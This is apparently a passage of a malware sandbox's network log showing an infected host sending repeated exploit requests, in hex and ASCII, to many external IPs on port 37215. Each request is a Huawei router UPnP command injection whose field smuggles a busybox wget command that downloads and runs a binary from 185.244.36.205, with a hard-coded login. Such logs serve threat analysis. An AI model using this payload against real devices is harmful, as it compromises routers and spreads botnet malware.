                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              796192.168.2.1557776102.94.172.7537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230196953 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              797192.168.2.153803294.130.21.1837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230199099 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              798192.168.2.154637231.91.115.14937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230232000 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              799192.168.2.1551628121.136.47.9137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230247974 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              800192.168.2.1538062222.106.30.437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230293036 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              801192.168.2.1559054156.152.89.24337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230298996 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              802192.168.2.154634831.237.190.14637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230351925 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              803192.168.2.1543474156.37.125.17737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230355978 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              804192.168.2.154698685.30.147.16437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230385065 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              805192.168.2.1553060122.117.78.1737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230432034 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              806192.168.2.1550622122.186.218.22037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230432987 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
